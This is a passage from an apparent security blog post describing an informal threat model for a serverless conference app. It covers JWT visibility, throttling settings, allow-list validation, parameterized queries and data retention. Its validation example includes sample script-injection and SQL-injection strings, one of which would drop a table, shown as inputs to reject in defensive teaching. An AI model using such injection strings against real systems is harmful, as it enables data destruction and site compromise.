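    padded = segment + "=" * (-len(segment) % 4)  # restore base64url padding
    return json.loads(base64.urlsafe_b64decode(padded))

h, p, _sig = token.split(".")
print(decode_segment(h))  # {'alg': 'HS256', 'typ': 'JWT'}
print(decode_segment(p))  # {'session': 'abc123', 'role': 'user'} - readable by anyone
```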
Then we talked about my concerns, which started with a bunch of questions for Bryan about his users and his data.
What data are you asking for from your users? Is any of it sensitive?
He’s asking for their GitHub info, so that he can grant them access to call his serverless app, but that is all. This one piece of data is sensitive info.
Who are your users? What are their motivations to use your app?
The users are conference attendees who want to learn how to call a serverless app like an API, and then make his app do the cool thing that it would do. It’s a learning opportunity, and it’s fun.
Let’s assume you have a malicious user, how could they attack your app?
My first concern was Denial of Service or Brute Force-style attacks. To avoid these attack vectors he should follow the Azure Functions best practices guide; specifically, he should set maxConcurrentRequests to a small number (to avoid a distributed denial of service), add throttling (slowing down requests to a reasonable speed, which would stop scripted attacks) by enabling the dynamicThrottlesEnabled flag, and ideally also set a low number for the maxOutstandingRequests setting, to ensure no one overflows his buffer for requests, which would also result in a denial of service. (Note this is the “A” in CIA: availability.)
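For reference, in a Functions v2 host.json those settings sit under the http extension and look something like this (the numbers are placeholders to tune for your own workload, not recommendations):

```json
{
  "version": "2.0",
  "extensions": {
    "http": {
      "maxConcurrentRequests": 25,
      "maxOutstandingRequests": 50,
      "dynamicThrottlesEnabled": true
    }
  }
}
```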
Other attacks I was concerned about were someone sending malformed requests, in an attempt to elicit unexpected behaviour from his app, such as crashing, deleting or modifying data, allowing the user to inject their own code, or other potential issues. We discussed using a white list for user input validation and rejecting all requests that were not perfectly formed, or that contained any characters that were not “a-z, A-Z, 0-9”. (Note this is an attack on both Integrity and Availability.)
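As a sketch of that allow-list approach (a hypothetical parameter check in Python, not whatever his Function actually uses):

```python
import re

# Accept only strictly alphanumeric parameter values; reject anything else
# outright rather than trying to "clean up" suspicious input.
VALID_INPUT = re.compile(r"[A-Za-z0-9]+")

def is_valid(value: str) -> bool:
    return VALID_INPUT.fullmatch(value) is not None

print(is_valid("octocat123"))                     # True
print(is_valid("<script>alert(1)</script>"))      # False - reject the request
print(is_valid("robert'); DROP TABLE users;--"))  # False - reject the request
```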
The last attack vector I will list here is that users may attempt to access the data itself, the subscription IDs of all the other users (Confidentiality). This was the most important of the risks in this list, as you are the guardian of this data, and if you lose it and your users are attacked successfully as a result, this could cause catastrophic reputation damage (to the conference, to him as the creator of the app, to Microsoft as his employer). When I explained this, it became his #1 priority to ensure his users and their data were protected during and after using his system.
Tanya Janca, South Korea, DMZ, 2019
How long are you keeping this data? Where are you storing it? How are you storing it?
Originally Bryan was hoping to avoid using a database altogether; no data collection means nothing to steal. Although he’s still looking into whether that’s a possibility, the plan is to use a database, for now.
He decided he would keep the data until just after the conference was over, and then destroy it all (hence making the risk only a ~48-hour risk). It would be stored in a database; we discussed encryption at rest and in transit, as well as always using parameterized queries, and applying least privilege for the DB user that calls those queries (likely read-only or read/write, but never DBO).
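A quick sketch of the parameterized-query piece of that conversation (Python and sqlite3 just to keep the example self-contained; the table and column names are made up):

```python
import sqlite3

# The user-supplied value is passed as a parameter, never concatenated into the SQL,
# so injection attempts are treated as plain data rather than as part of the query.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE attendees (github_handle TEXT)")
conn.execute("INSERT INTO attendees VALUES (?)", ("octocat",))

def find_attendee(handle: str):
    return conn.execute(
        "SELECT github_handle FROM attendees WHERE github_handle = ?", (handle,)
    ).fetchall()

print(find_attendee("octocat"))      # [('octocat',)]
print(find_attendee("' OR '1'='1"))  # [] - the injection attempt finds nothing
```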
What country is this conference in? Will you be subject to GDPR?
It would be in Europe, and therefore is subject to GDPR. I introduced him to Miriam Wiesner, an MSFT employee with a Pentesting and Security Assessment background, who happens to live in the EU and therefore would have familiarity. I said she would have better advice than I would.
The conversation was about an hour, but I think you get the picture.
The key to serverless is to remember that almost all the same web app vulnerabilities still apply, such as Injection or Denial of Service (DoS) attacks, and that just because there is no server for you to manage does not mean you do not need to be diligent about the security of your application.
If you want to keep up with Bryan Hughes, and see the results of his project, you can follow him on Dev.TO.
I hope that you found this informal threat model helpful.